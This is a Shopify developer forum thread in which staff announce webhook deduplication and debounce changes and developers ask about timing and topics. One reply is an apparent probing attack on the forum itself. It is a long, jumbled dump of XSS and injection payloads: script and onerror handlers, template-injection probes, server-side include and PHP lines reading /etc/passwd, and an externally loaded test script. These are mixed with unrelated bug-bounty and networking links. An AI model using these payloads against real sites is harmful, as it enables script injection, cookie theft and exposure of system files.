Upcoming improvements to Webhooks

Highlighted
Shopify Staff
Shopify Staff
257 1 63

Update Jan 12th below:

The de-bounce change is now live for all shops.  Please keep leaving your questions and concerns around this new improvement in this thread.  Feel free to share some stats as well.

As for other webhook related issues; feel free to keep bringing them up as well, just note that these improvements are solely based on eliminating duplicates and do not alter the contents of any existing webhooks.

 

Update Jan 4th below:

We are going to be starting a tiered rollout early next week for the webhook improvements.

The changes will be what is described in the original post, with the exception that we will exclude any webhook topics that are /add or /create.

As always we look forward to your feedback before and after this feature has rolled out.  Feel free to reply with any questions or concerns.

 

Hey All,

We are introducing a number of improvements to how Shopify delivers webhooks.  Our existing webhooks implementation offers a poor experience for app developers on a number of dimensions:

  1. Flooding.

    • A spike of requests on Shopify's side causes a spike of webhooks to be sent to apps (e.g., a flash sale). Apps have to design against this.

  2. Duplication.

    • Our webhook implementation often sends duplicate webhook payloads in a short period of time. For app developers, this translates to increased hardware requirements for processing as well as additional contention for the affected resources.

We are introducing changes to improve the above issues that will have a twofold impact; a net reduction in webhooks received from Shopify, as well as short delay between an action and the webhook being sent in order to ensure that only the most recent state is communicated to your app.

For example:  The following actions are performed in quick succession;

  1. A product is created

  2. A title is added to the product

  3. A description is added to the product

  4. A price is added to the product

Previously the behaviour would result in a products/create webhook, and then three subsequent products/update webhooks, not necessarily in the order of changes made.

After introducing these improvements, a products/create webhook would be sent, and then a single products/update webhook with the most up-to-date payload would be sent after a short delay.

If you have questions or concerns about these changes, please comment in the thread below so we can address them prior to launch.

 

All the best,

Ryan O

Developer Experience

Shopify

Developer Experience @ Shopify
3 Likes
Explorer
98 0 15

Great improvements.

I experienced that for a single shop attribute change, the shop/update webhook gets fired four times (details in this post). Is this going to be improved, so that it gets fired only once, too?

Looga.io
0 Likes
New Member
4 0 0

Awesome! We were looking for updates about address changes. I thought that customer.updated would be that -- but that was firing on every new order. 

Thanks!

0 Likes
Shopify Staff
Shopify Staff
257 1 63

Hi Felix,

The issue you describe is indeed one of the scenarios this change is aiming to fix.  Thanks for your feedback!

Ryan

Developer Experience @ Shopify
0 Likes
Shopify Partner
32 0 3

Hi Ryan,

That's a great update!

Do all webhook topics get the delays or only the ones that can have an issue like the one you described. I'm most interested in the the orders/create webhook, as a delay on that one would have a very negative impact on loads of apps. :)

And do you have more info on the timeline of the updates?

Cheers,

Harold

0 Likes
Trailblazer
636 0 87

Awesome news!

On a very related note, I'm still trying to figure out, Does the [orders/updated] webhook fire whenever any other [orders/*] webhook fires? No point subscribing to all other topics if that is the case...

0 Likes
New Member
6 0 0

Hi there,
Wonderful!
From this morning we are heading some issues with APP deletion webhook. With some test account works correctly with others not.
It started more or less today, do you think is a conseguence of your webhooks restructuring process?

0 Likes
Shopify Staff
Shopify Staff
257 1 63

Thanks for all the feedback, please keep leaving questions and comments.  We are reading and discussing all of the feedback we've gotten.

 

Ryan

Developer Experience @ Shopify
0 Likes
New Member
8 0 0

"></img><img src=x onerror=confirm(/Xss-By-Arafat/)>/ </textarea><ScRiPt>prompt(/920065/)</ScRiPt// "><iframe/onload=alert(document.domain)// ${pageScope} "><svg/onload=alert(/2/);> "onmouseover="confirm(2); "><frameset/onpageshow=alert(/X/)> <input onfocus=prompt(document.domain) autofocus>"--> "/**/autofocus/**/onfocus="alert('XSSPOSED');" "></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt> ;print(md5(xss)); set|set&set </input><input type=``text``//;value=`` autofocus onfocus=alert(1) a=``> ><script src='//html5sec.org/test.js' "details/onmouseover=[_=con\u0066\u0069\u0072m,_(1)]//${100*9} {{7*7}}<!--#exec cmd="cat /etc/passwd" --> `-alert`/1/`">'onload="`<SvG/1=' `-alert`1`">'onload="`<svg/1=' "onfocus="prompt`1`"autofocus "[user]"></img><img src=x onerror=confirm(/BUG/)>/ </textarea><ScRiPt>prompt(/920065/)</ScRiPt// "><iframe/onload=alert(document.domain)// ${pageScope} "><svg/onload=alert(/2/);> "onmouseover="confirm(2); "><frameset/onpageshow=alert(/X/)> <input onfocus=prompt(document.domain) autofocus>"--> "/**/autofocus/**/onfocus="alert('XSSPOSED');" "></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt>[video]"></img><img src=x onerror=confirm(/BUG/)>/ </textarea><ScRiPt>prompt(/920065/)</ScRiPt// "><iframe/onload=alert(document.domain)// ${pageScope} "><svg/onload=alert(/document.domain/);> "onmouseover="confirm(2); "><frameset/onpageshow=alert(/X/)> <input onfocus=prompt(1) autofocus>"--> "/**/autofocus/**/onfocus="alert('XSSPOSED');" "></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt>[image]"></img><img src=x onerror=confirm(/document.domain/)>/ </textarea><ScRiPt>prompt(/920065/)</ScRiPt// ${pageScope} "><svg/onload=alert(/2/);> "onmouseover="confirm(2); "><frameset/onpageshow=alert(/X/)> <input onfocus=prompt(1) autofocus>"--> "/**/autofocus/**/onfocus="alert('XSSPOSED');" "></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt> ;print(md5(xss)); set|set&set </input><input type=``text``//;value=`` autofocus onfocus=alert(1) a=``> ><script src='//html5sec.org/test.js' "details/onmouseover=[_=con\u0066\u0069\u0072m,_(1)]//${100*9} {{7*7}}<!--#exec cmd="cat /etc/passwd" -->"><iframe/onload=alert(document.domain)//  `-alert`/1/`">'onload="`<SvG/1=' `-alert`1`">'onload="`<svg/1=' "onfocus="prompt`document.domain`"autofocus "[/image] ;print(md5(xss)); set|set&set </input><input type=``text``//;value=`` autofocus onfocus=alert(1) a=``> ><script src='//html5sec.org/test.js' "details/onmouseover=[_=con\u0066\u0069\u0072m,_(1)]//${100*9} {{7*7}}<!--#exec cmd="cat /etc/passwd" --> `-alert`/1/`">'onload="`<SvG/1=' `-alert`1`">'onload="`<svg/1=' "onfocus="prompt`1`"autofocus "[/video] ;print(md5(xss)); set|set&set </input><input type=``text``//;value=`` autofocus onfocus=alert(1) a=``> ><script src='//html5sec.org/test.js' "details/onmouseover=[_=con\u0066\u0069\u0072m,_(1)]//${100*9} {{7*7}}<!--#exec cmd="cat /etc/passwd" --> `-alert`/1/`">'onload="`<SvG/1=' `-alert`1`">'onload="`<svg/1=' "onfocus="prompt`1`"autofocus "   javascript:alert(document.domain) "onmouseover="prompt(document.domain) h/<\i<script>alert("i");</script> "><marquee><IMG src=x onmouseover=prompt(document.domain);></marquee> https://www.playstation.com/en-us/search/?q=" /><script>alert(1);// ' -confirm(document.domain)-'# "><img/src='1'onerror=alert(1)> "><svg/onload=alert(domain)> "><script>alert('xss')</script> "><img src=x onerror=alert(domain)>@ymail.com "><img src=x onerror=prompt(document.domain)>" "> <img src="x" onerror="prompt(domain)"></img> https://edu.sphero.com/api/v1/notifications/?event_id=&page=1 #//><img src=x><svg/onload=confirm("Xss-By-Arafat")> </script><video src=x onerror=alert(document.domain)> "></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt> javascript://google.com/?%0aalert(document.domain) &lt;img src=x onerror=prompt(999)&gt; &#34;&#62;&#60;img/src=1 onerror=alert(1)&#62; %22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%280%29%3E aaa">fffff</script><script>alert(document.domain)</script>aaaaa "></title><img src=1 onerror=prompt(document.domain)> %27%22%3E%3Cscript%3Ealert%28%27XSS%20@%20%27%2bdocument.domain%29%3C%2fscript%3E  javascripT://https://google.com%0aalert(1);//https://google.com  <form><button formaction="javascript:alert(123)">xss  {php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}  {7*7}  &#x3C;img/­src=&#x60;%00&#x60; onerror=this.onerror­=alert(document.cook­i  <svg/on<script>load=prompt(document.domain);>”/><svg/on<script>load=prompt(document.cookie);>  <a href="javascript&colon;alert&lpar;document&period;domain&rpar;">Click Here</a>  "><a+href%3Djava%26%230000000000000000115%3Bcript%3Aalert(document.domain)>pwned<%2Fa> "><a href=javascript:alert(document.domain)>pwned</a>   https://google.com\'onmouseover='prompt(1)' <div id="document.domain"><svg><style>&lt;img/src=x onerror=prompt(document.domain)// </br>//["`-->]]>]</div> <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">poc</a>  <img ismap='xxx' itemtype='yyy style=width:100%;height:100%;position:fixed;left:\ 0px;top:0px; onmouseover=alert(/XSS/)//'>  <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('POST','https://www.facebook.com',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>  https://ysx.me.uk/managed-apps-and-music-a-tale-of-two-xsses-in-google-play/ https://www.google.com/about/products/ https://console.firebase.google.com/u/0/project/hack-the-planet-5b5e8/durablelinks/links/  https://keep.google.com/#label/"><img src=x onerror=prompt(document.domain)> https://analytics.google.com/analytics/web/provision/?authuser=0#provision/CreateAccount/ https://www.google.com/adsense/new/u/0/pub-4127070350294644/main/viewreports?ag=adunit&dd=1YadunitY1Yca-pub-4127070350294644%3A2170479614Y%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(document.domain)%3E https://adwords.google.com/cm/CampaignMgmt?authuser=0&__u=9607352639&__c=9093529919#c.883816992_fbid_49865364848.ag&app=cm  https://medium.com/@muzammilabbas/sending-message-to-any-seller-onbehalf-of-any-user-11428673e47f  http://zappysys.com/products/zappyshell/  https://medium.com/@arbazhussain/stored-xss-on-rockstar-game-c008ec18d071 Rules > http://h1.nobbd.de/ http://bugbountyworld.com/ https://medium.com/@phwd https://whitton.io/ https://medium.com/@arbazhussain/10-rules-of-bug-bounty-65082473ab8c  Facebook>> https://web.facebook.com/notes/phwd/facebook-bug-bounties-the-unofficial-treasure-map/1020506894706001?_rdc=1&_rdr https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71      http://zappysys.com/products/zappyshell/amazon-s3-command-line-tools/  https://www.edmodo.com/admins https://www.edmodo.com/institutions/claims-stage3  </script><script>alert(document.domain)</script>  https://www.pcworld.com/article/3072638/home-networking/how-to-measure-monitor-and-manage-your-broadband-consumption.html  https://www.clearos.com/clearfoundation/social/community/how-to-block-netcut-with-firewall  http://www.tp-link.com.my/article/?id=169  netstat -r , net view  https://www.paessler.com/router_monitoring  https://www.softperfect.com/products/networx/  https://www.raymond.cc/blog/protect-your-computer-against-arp-poison-attack-netcut/  http://www.xarp.net/  http://smallbusiness.chron.com/tracking-data-usage-pc-70991.html

">/
0 Likes
Shopify Staff
Shopify Staff
257 1 63

Hey all,

We are going to be starting a tiered rollout early next week for the webhook improvements.

The changes will be what is described in the original post, with the exception that we will exclude any webhook topics that are /add or /create.

As always we look forward to your feedback before and after this feature has rolled out.  Feel free to reply with any questions or concerns.

 

Ryan

 

Developer Experience @ Shopify
0 Likes